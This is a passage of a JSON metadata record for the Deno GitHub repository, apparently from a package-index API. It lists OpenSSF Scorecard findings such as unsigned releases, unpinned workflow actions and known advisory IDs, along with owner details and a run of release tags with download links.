code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F